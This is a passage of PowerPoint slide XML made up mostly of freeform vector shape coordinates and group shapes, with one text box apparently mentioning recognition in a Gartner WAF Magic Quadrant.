                        <a:pt x="382" y="104"/>
                        <a:pt x="382" y="104"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="435" y="104"/>
                        <a:pt x="435" y="104"/>
                        <a:pt x="435" y="104"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="435" y="192"/>
                        <a:pt x="435" y="192"/>
                        <a:pt x="435" y="192"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="438" y="188"/>
                        <a:pt x="441" y="183"/>
                        <a:pt x="444" y="178"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="457" y="160"/>
                        <a:pt x="470" y="145"/>
                        <a:pt x="481" y="132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117" y="339"/>
                        <a:pt x="117" y="339"/>
                        <a:pt x="117" y="339"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="340" y="270"/>
                        <a:pt x="340" y="270"/>
                        <a:pt x="340" y="270"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="325" y="250"/>
                        <a:pt x="325" y="250"/>
                        <a:pt x="325" y="250"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="319" y="242"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="386" y="40"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="392" y="35"/>
                        <a:pt x="400" y="32"/>
                        <a:pt x="408" y="32"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="417" y="32"/>
                        <a:pt x="425" y="35"/>
                        <a:pt x="431" y="40"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="437" y="45"/>
                        <a:pt x="440" y="53"/>
                        <a:pt x="440" y="62"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="440" y="71"/>
                        <a:pt x="437" y="78"/>
                        <a:pt x="431" y="83"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="425" y="89"/>
                        <a:pt x="417" y="91"/>
                        <a:pt x="408" y="91"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="400" y="91"/>
                        <a:pt x="392" y="89"/>
                        <a:pt x="386" y="83"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="380" y="78"/>
                        <a:pt x="377" y="71"/>
                        <a:pt x="377" y="62"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="377" y="53"/>
                        <a:pt x="380" y="45"/>
                        <a:pt x="386" y="40"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="209" y="172"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="206" y="178"/>
                        <a:pt x="201" y="183"/>
                        <a:pt x="194" y="187"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="188" y="191"/>
                        <a:pt x="180" y="194"/>
                        <a:pt x="171" y="196"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="162" y="198"/>
                        <a:pt x="152" y="199"/>
                        <a:pt x="141" y="199"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="132" y="199"/>
                        <a:pt x="132" y="199"/>
                        <a:pt x="132" y="199"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="132" y="240"/>
                        <a:pt x="132" y="240"/>
                        <a:pt x="132" y="240"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="80" y="240"/>
                        <a:pt x="80" y="240"/>
                        <a:pt x="80" y="240"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="80" y="104"/>
                        <a:pt x="80" y="104"/>
                        <a:pt x="80" y="104"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="141" y="104"/>
                        <a:pt x="141" y="104"/>
                        <a:pt x="141" y="104"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="164" y="104"/>
                        <a:pt x="182" y="108"/>
                        <a:pt x="195" y="116"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="208" y="123"/>
                        <a:pt x="215" y="135"/>
                        <a:pt x="215" y="151"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="215" y="159"/>
                        <a:pt x="213" y="166"/>
                        <a:pt x="209" y="1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</p:grpSp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="202" name="Group 201">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53778B6C-7047-434F-BDA8-C08A50FC5D8E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4894550" y="5757020"/>
              <a:ext cx="690289" cy="623146"/>
              <a:chOff x="4056501" y="5757020"/>
              <a:chExt cx="690289" cy="623146"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="203" name="Shape 115">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74AAEAED-E598-DA48-9ED3-EAFE19871340}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4056501" y="6103167"/>
                <a:ext cx="69028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Recognized on the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Gartner WAF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Magic Quadrant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  <a:sym typeface="Arial"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="204" name="그룹 41">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6386BCC-E071-2442-8AAB-782F3B328F75}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr userDrawn="1"/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="4135064" y="5757020"/>
                <a:ext cx="533161" cy="124846"/>
                <a:chOff x="13752449" y="23952224"/>
                <a:chExt cx="3382963" cy="792163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05" name="Freeform 63">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{263BDAA7-F307-544C-B430-137EA40A4C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25849" y="24210986"/>
                  <a:ext cx="309563" cy="511175"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 63 w 73"/>
                    <a:gd name="T1" fmla="*/ 0 h 121"/>
                    <a:gd name="T2" fmla="*/ 31 w 73"/>
                    <a:gd name="T3" fmla="*/ 15 h 121"/>
                    <a:gd name="T4" fmla="*/ 31 w 73"/>
                    <a:gd name="T5" fmla="*/ 0 h 121"/>
                    <a:gd name="T6" fmla="*/ 0 w 73"/>
                    <a:gd name="T7" fmla="*/ 0 h 121"/>
                    <a:gd name="T8" fmla="*/ 0 w 73"/>
                    <a:gd name="T9" fmla="*/ 121 h 121"/>
                    <a:gd name="T10" fmla="*/ 32 w 73"/>
                    <a:gd name="T11" fmla="*/ 121 h 121"/>
                    <a:gd name="T12" fmla="*/ 32 w 73"/>
                    <a:gd name="T13" fmla="*/ 57 h 121"/>
                    <a:gd name="T14" fmla="*/ 60 w 73"/>
                    <a:gd name="T15" fmla="*/ 28 h 121"/>
                    <a:gd name="T16" fmla="*/ 71 w 73"/>
                    <a:gd name="T17" fmla="*/ 28 h 121"/>
                    <a:gd name="T18" fmla="*/ 73 w 73"/>
                    <a:gd name="T19" fmla="*/ 0 h 121"/>
                    <a:gd name="T20" fmla="*/ 63 w 73"/>
                    <a:gd name="T21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3" h="121">
                      <a:moveTo>
                        <a:pt x="63" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="49" y="0"/>
                        <a:pt x="38" y="5"/>
                        <a:pt x="31" y="15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1"/>
                        <a:pt x="0" y="121"/>
                        <a:pt x="0" y="121"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="32" y="121"/>
                        <a:pt x="32" y="121"/>
                        <a:pt x="32" y="121"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="32" y="57"/>
                        <a:pt x="32" y="57"/>
                        <a:pt x="32" y="57"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="32" y="43"/>
                        <a:pt x="42" y="28"/>
                        <a:pt x="60" y="28"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="71" y="28"/>
                        <a:pt x="71" y="28"/>
                        <a:pt x="71" y="28"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="73" y="0"/>
                        <a:pt x="73" y="0"/>
                        <a:pt x="73" y="0"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="6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06" name="Freeform 64">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB1C7659-4466-9D40-8549-55EFAD058E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33649" y="24196699"/>
                  <a:ext cx="461963" cy="525463"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 66 w 109"/>
                    <a:gd name="T1" fmla="*/ 0 h 124"/>
                    <a:gd name="T2" fmla="*/ 31 w 109"/>
                    <a:gd name="T3" fmla="*/ 18 h 124"/>
                    <a:gd name="T4" fmla="*/ 30 w 109"/>
                    <a:gd name="T5" fmla="*/ 3 h 124"/>
                    <a:gd name="T6" fmla="*/ 0 w 109"/>
                    <a:gd name="T7" fmla="*/ 3 h 124"/>
                    <a:gd name="T8" fmla="*/ 0 w 109"/>
                    <a:gd name="T9" fmla="*/ 124 h 124"/>
                    <a:gd name="T10" fmla="*/ 32 w 109"/>
                    <a:gd name="T11" fmla="*/ 124 h 124"/>
                    <a:gd name="T12" fmla="*/ 32 w 109"/>
                    <a:gd name="T13" fmla="*/ 58 h 124"/>
                    <a:gd name="T14" fmla="*/ 57 w 109"/>
                    <a:gd name="T15" fmla="*/ 30 h 124"/>
                    <a:gd name="T16" fmla="*/ 77 w 109"/>
                    <a:gd name="T17" fmla="*/ 60 h 124"/>
                    <a:gd name="T18" fmla="*/ 77 w 109"/>
                    <a:gd name="T19" fmla="*/ 124 h 124"/>
                    <a:gd name="T20" fmla="*/ 109 w 109"/>
                    <a:gd name="T21" fmla="*/ 124 h 124"/>
                    <a:gd name="T22" fmla="*/ 109 w 109"/>
                    <a:gd name="T23" fmla="*/ 48 h 124"/>
                    <a:gd name="T24" fmla="*/ 66 w 109"/>
                    <a:gd name="T25" fmla="*/ 0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09" h="124">
                      <a:moveTo>
                        <a:pt x="66" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="49" y="0"/>
                        <a:pt x="37" y="8"/>
                        <a:pt x="31" y="18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24"/>
                        <a:pt x="0" y="124"/>
                        <a:pt x="0" y="124"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="32" y="124"/>
                        <a:pt x="32" y="124"/>
                        <a:pt x="32" y="124"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="32" y="58"/>
                        <a:pt x="32" y="58"/>
                        <a:pt x="32" y="58"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="32" y="43"/>
                        <a:pt x="39" y="30"/>
                        <a:pt x="57" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="76" y="30"/>
                        <a:pt x="77" y="47"/>
                        <a:pt x="77" y="60"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="77" y="124"/>
                        <a:pt x="77" y="124"/>
                        <a:pt x="77" y="124"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="109" y="124"/>
                        <a:pt x="109" y="124"/>
                        <a:pt x="109" y="124"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="109" y="48"/>
                        <a:pt x="109" y="48"/>
                        <a:pt x="109" y="48"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="109" y="24"/>
                        <a:pt x="99" y="0"/>
                        <a:pt x="6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07" name="Freeform 65">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{101C346F-3AEE-1845-A76C-E5E0F3A11D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403449" y="24066524"/>
                  <a:ext cx="271463" cy="665163"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 32 w 64"/>
                    <a:gd name="T1" fmla="*/ 112 h 157"/>
                    <a:gd name="T2" fmla="*/ 32 w 64"/>
                    <a:gd name="T3" fmla="*/ 62 h 157"/>
                    <a:gd name="T4" fmla="*/ 62 w 64"/>
                    <a:gd name="T5" fmla="*/ 62 h 157"/>
                    <a:gd name="T6" fmla="*/ 64 w 64"/>
                    <a:gd name="T7" fmla="*/ 34 h 157"/>
                    <a:gd name="T8" fmla="*/ 32 w 64"/>
                    <a:gd name="T9" fmla="*/ 34 h 157"/>
                    <a:gd name="T10" fmla="*/ 32 w 64"/>
                    <a:gd name="T11" fmla="*/ 0 h 157"/>
                    <a:gd name="T12" fmla="*/ 0 w 64"/>
                    <a:gd name="T13" fmla="*/ 0 h 157"/>
                    <a:gd name="T14" fmla="*/ 0 w 64"/>
                    <a:gd name="T15" fmla="*/ 115 h 157"/>
                    <a:gd name="T16" fmla="*/ 39 w 64"/>
                    <a:gd name="T17" fmla="*/ 157 h 157"/>
                    <a:gd name="T18" fmla="*/ 62 w 64"/>
                    <a:gd name="T19" fmla="*/ 154 h 157"/>
                    <a:gd name="T20" fmla="*/ 64 w 64"/>
                    <a:gd name="T21" fmla="*/ 127 h 157"/>
                    <a:gd name="T22" fmla="*/ 47 w 64"/>
                    <a:gd name="T23" fmla="*/ 130 h 157"/>
                    <a:gd name="T24" fmla="*/ 32 w 64"/>
                    <a:gd name="T25" fmla="*/ 112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4" h="157">
                      <a:moveTo>
                        <a:pt x="32" y="112"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="32" y="62"/>
                        <a:pt x="32" y="62"/>
                        <a:pt x="32" y="62"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="62"/>
                        <a:pt x="62" y="62"/>
                        <a:pt x="62" y="62"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="64" y="34"/>
                        <a:pt x="64" y="34"/>
                        <a:pt x="64" y="34"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="32" y="34"/>
                        <a:pt x="32" y="34"/>
                        <a:pt x="32" y="34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43"/>
                        <a:pt x="9" y="157"/>
                        <a:pt x="39" y="157"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="47" y="157"/>
                        <a:pt x="54" y="156"/>
                        <a:pt x="62" y="154"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="64" y="127"/>
                        <a:pt x="64" y="127"/>
                        <a:pt x="64" y="127"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="57" y="129"/>
                        <a:pt x="52" y="130"/>
                        <a:pt x="47" y="130"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="35" y="130"/>
                        <a:pt x="32" y="124"/>
                        <a:pt x="32" y="1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08" name="Freeform 66">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68FC6B4C-A862-1D47-9996-3BDDC9ED70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060549" y="24210986"/>
                  <a:ext cx="300038" cy="511175"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 31 w 71"/>
                    <a:gd name="T1" fmla="*/ 15 h 121"/>
                    <a:gd name="T2" fmla="*/ 31 w 71"/>
                    <a:gd name="T3" fmla="*/ 0 h 121"/>
                    <a:gd name="T4" fmla="*/ 0 w 71"/>
                    <a:gd name="T5" fmla="*/ 0 h 121"/>
                    <a:gd name="T6" fmla="*/ 0 w 71"/>
                    <a:gd name="T7" fmla="*/ 121 h 121"/>
                    <a:gd name="T8" fmla="*/ 32 w 71"/>
                    <a:gd name="T9" fmla="*/ 121 h 121"/>
                    <a:gd name="T10" fmla="*/ 32 w 71"/>
                    <a:gd name="T11" fmla="*/ 57 h 121"/>
                    <a:gd name="T12" fmla="*/ 59 w 71"/>
                    <a:gd name="T13" fmla="*/ 28 h 121"/>
                    <a:gd name="T14" fmla="*/ 68 w 71"/>
                    <a:gd name="T15" fmla="*/ 28 h 121"/>
                    <a:gd name="T16" fmla="*/ 71 w 71"/>
                    <a:gd name="T17" fmla="*/ 0 h 121"/>
                    <a:gd name="T18" fmla="*/ 63 w 71"/>
                    <a:gd name="T19" fmla="*/ 0 h 121"/>
                    <a:gd name="T20" fmla="*/ 31 w 71"/>
                    <a:gd name="T21" fmla="*/ 15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1" h="121">
                      <a:moveTo>
                        <a:pt x="31" y="15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1"/>
                        <a:pt x="0" y="121"/>
                        <a:pt x="0" y="121"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="32" y="121"/>
                        <a:pt x="32" y="121"/>
                        <a:pt x="32" y="121"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="32" y="57"/>
                        <a:pt x="32" y="57"/>
                        <a:pt x="32" y="57"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="32" y="43"/>
                        <a:pt x="41" y="28"/>
                        <a:pt x="59" y="28"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="68" y="28"/>
                        <a:pt x="68" y="28"/>
                        <a:pt x="68" y="28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49" y="0"/>
                        <a:pt x="38" y="5"/>
                        <a:pt x="31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09" name="Freeform 67">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{898F8332-0878-8B45-BEBB-4E4B665C5C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52449" y="23952224"/>
                  <a:ext cx="693738" cy="792163"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 94 w 164"/>
                    <a:gd name="T1" fmla="*/ 111 h 187"/>
                    <a:gd name="T2" fmla="*/ 130 w 164"/>
                    <a:gd name="T3" fmla="*/ 111 h 187"/>
                    <a:gd name="T4" fmla="*/ 130 w 164"/>
                    <a:gd name="T5" fmla="*/ 149 h 187"/>
                    <a:gd name="T6" fmla="*/ 92 w 164"/>
                    <a:gd name="T7" fmla="*/ 155 h 187"/>
                    <a:gd name="T8" fmla="*/ 36 w 164"/>
                    <a:gd name="T9" fmla="*/ 92 h 187"/>
                    <a:gd name="T10" fmla="*/ 90 w 164"/>
                    <a:gd name="T11" fmla="*/ 32 h 187"/>
                    <a:gd name="T12" fmla="*/ 139 w 164"/>
                    <a:gd name="T13" fmla="*/ 47 h 187"/>
                    <a:gd name="T14" fmla="*/ 162 w 164"/>
                    <a:gd name="T15" fmla="*/ 24 h 187"/>
                    <a:gd name="T16" fmla="*/ 92 w 164"/>
                    <a:gd name="T17" fmla="*/ 1 h 187"/>
                    <a:gd name="T18" fmla="*/ 0 w 164"/>
                    <a:gd name="T19" fmla="*/ 94 h 187"/>
                    <a:gd name="T20" fmla="*/ 92 w 164"/>
                    <a:gd name="T21" fmla="*/ 187 h 187"/>
                    <a:gd name="T22" fmla="*/ 164 w 164"/>
                    <a:gd name="T23" fmla="*/ 169 h 187"/>
                    <a:gd name="T24" fmla="*/ 164 w 164"/>
                    <a:gd name="T25" fmla="*/ 81 h 187"/>
                    <a:gd name="T26" fmla="*/ 97 w 164"/>
                    <a:gd name="T27" fmla="*/ 81 h 187"/>
                    <a:gd name="T28" fmla="*/ 94 w 164"/>
                    <a:gd name="T29" fmla="*/ 111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64" h="187">
                      <a:moveTo>
                        <a:pt x="94" y="111"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="130" y="111"/>
                        <a:pt x="130" y="111"/>
                        <a:pt x="130" y="111"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="130" y="149"/>
                        <a:pt x="130" y="149"/>
                        <a:pt x="130" y="149"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="120" y="154"/>
                        <a:pt x="109" y="156"/>
                        <a:pt x="92" y="155"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="58" y="154"/>
                        <a:pt x="36" y="129"/>
                        <a:pt x="36" y="92"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="36" y="58"/>
                        <a:pt x="57" y="34"/>
                        <a:pt x="90" y="32"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="110" y="31"/>
                        <a:pt x="127" y="37"/>
                        <a:pt x="139" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="162" y="24"/>
                        <a:pt x="162" y="24"/>
                        <a:pt x="162" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="143" y="7"/>
                        <a:pt x="119" y="0"/>
                        <a:pt x="92" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="39" y="1"/>
                        <a:pt x="0" y="38"/>
                        <a:pt x="0" y="94"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="151"/>
                        <a:pt x="39" y="185"/>
                        <a:pt x="92" y="187"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="121" y="187"/>
                        <a:pt x="142" y="181"/>
                        <a:pt x="164" y="169"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="164" y="81"/>
                        <a:pt x="164" y="81"/>
                        <a:pt x="164" y="81"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="97" y="81"/>
                        <a:pt x="97" y="81"/>
                        <a:pt x="97" y="81"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="94" y="1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10" name="Freeform 68">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3607C310-F6B6-BC4C-A6E6-9D099AC47F2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6254349" y="24196699"/>
                  <a:ext cx="512763" cy="538163"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 62 w 121"/>
                    <a:gd name="T1" fmla="*/ 0 h 127"/>
                    <a:gd name="T2" fmla="*/ 0 w 121"/>
                    <a:gd name="T3" fmla="*/ 64 h 127"/>
                    <a:gd name="T4" fmla="*/ 63 w 121"/>
                    <a:gd name="T5" fmla="*/ 127 h 127"/>
                    <a:gd name="T6" fmla="*/ 116 w 121"/>
                    <a:gd name="T7" fmla="*/ 102 h 127"/>
                    <a:gd name="T8" fmla="*/ 95 w 121"/>
                    <a:gd name="T9" fmla="*/ 85 h 127"/>
                    <a:gd name="T10" fmla="*/ 62 w 121"/>
                    <a:gd name="T11" fmla="*/ 100 h 127"/>
                    <a:gd name="T12" fmla="*/ 33 w 121"/>
                    <a:gd name="T13" fmla="*/ 75 h 127"/>
                    <a:gd name="T14" fmla="*/ 121 w 121"/>
                    <a:gd name="T15" fmla="*/ 75 h 127"/>
                    <a:gd name="T16" fmla="*/ 121 w 121"/>
                    <a:gd name="T17" fmla="*/ 65 h 127"/>
                    <a:gd name="T18" fmla="*/ 62 w 121"/>
                    <a:gd name="T19" fmla="*/ 0 h 127"/>
                    <a:gd name="T20" fmla="*/ 33 w 121"/>
                    <a:gd name="T21" fmla="*/ 50 h 127"/>
                    <a:gd name="T22" fmla="*/ 61 w 121"/>
                    <a:gd name="T23" fmla="*/ 25 h 127"/>
                    <a:gd name="T24" fmla="*/ 89 w 121"/>
                    <a:gd name="T25" fmla="*/ 50 h 127"/>
                    <a:gd name="T26" fmla="*/ 33 w 121"/>
                    <a:gd name="T27" fmla="*/ 50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21" h="127">
                      <a:moveTo>
                        <a:pt x="62" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="0"/>
                        <a:pt x="0" y="26"/>
                        <a:pt x="0" y="64"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="102"/>
                        <a:pt x="27" y="127"/>
                        <a:pt x="63" y="127"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="83" y="127"/>
                        <a:pt x="101" y="120"/>
                        <a:pt x="116" y="102"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="95" y="85"/>
                        <a:pt x="95" y="85"/>
                        <a:pt x="95" y="85"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="85" y="96"/>
                        <a:pt x="77" y="101"/>
                        <a:pt x="62" y="100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="47" y="100"/>
                        <a:pt x="35" y="91"/>
                        <a:pt x="33" y="75"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="121" y="75"/>
                        <a:pt x="121" y="75"/>
                        <a:pt x="121" y="75"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="121" y="65"/>
                        <a:pt x="121" y="65"/>
                        <a:pt x="121" y="65"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="121" y="24"/>
                        <a:pt x="100" y="0"/>
                        <a:pt x="62" y="0"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="33" y="50"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="35" y="36"/>
                        <a:pt x="45" y="26"/>
                        <a:pt x="61" y="25"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="76" y="25"/>
                        <a:pt x="88" y="34"/>
                        <a:pt x="89" y="50"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="33" y="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11" name="Freeform 69">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{773E2779-792A-A34F-83F0-0471FEBE845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4509687" y="24196699"/>
                  <a:ext cx="466725" cy="538163"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 57 w 110"/>
                    <a:gd name="T1" fmla="*/ 0 h 127"/>
                    <a:gd name="T2" fmla="*/ 4 w 110"/>
                    <a:gd name="T3" fmla="*/ 19 h 127"/>
                    <a:gd name="T4" fmla="*/ 22 w 110"/>
                    <a:gd name="T5" fmla="*/ 38 h 127"/>
                    <a:gd name="T6" fmla="*/ 54 w 110"/>
                    <a:gd name="T7" fmla="*/ 25 h 127"/>
                    <a:gd name="T8" fmla="*/ 79 w 110"/>
                    <a:gd name="T9" fmla="*/ 46 h 127"/>
                    <a:gd name="T10" fmla="*/ 79 w 110"/>
                    <a:gd name="T11" fmla="*/ 47 h 127"/>
                    <a:gd name="T12" fmla="*/ 73 w 110"/>
                    <a:gd name="T13" fmla="*/ 47 h 127"/>
                    <a:gd name="T14" fmla="*/ 1 w 110"/>
                    <a:gd name="T15" fmla="*/ 90 h 127"/>
                    <a:gd name="T16" fmla="*/ 44 w 110"/>
                    <a:gd name="T17" fmla="*/ 127 h 127"/>
                    <a:gd name="T18" fmla="*/ 81 w 110"/>
                    <a:gd name="T19" fmla="*/ 112 h 127"/>
                    <a:gd name="T20" fmla="*/ 82 w 110"/>
                    <a:gd name="T21" fmla="*/ 124 h 127"/>
                    <a:gd name="T22" fmla="*/ 110 w 110"/>
                    <a:gd name="T23" fmla="*/ 124 h 127"/>
                    <a:gd name="T24" fmla="*/ 110 w 110"/>
                    <a:gd name="T25" fmla="*/ 45 h 127"/>
                    <a:gd name="T26" fmla="*/ 57 w 110"/>
                    <a:gd name="T27" fmla="*/ 0 h 127"/>
                    <a:gd name="T28" fmla="*/ 79 w 110"/>
                    <a:gd name="T29" fmla="*/ 76 h 127"/>
                    <a:gd name="T30" fmla="*/ 33 w 110"/>
                    <a:gd name="T31" fmla="*/ 88 h 127"/>
                    <a:gd name="T32" fmla="*/ 75 w 110"/>
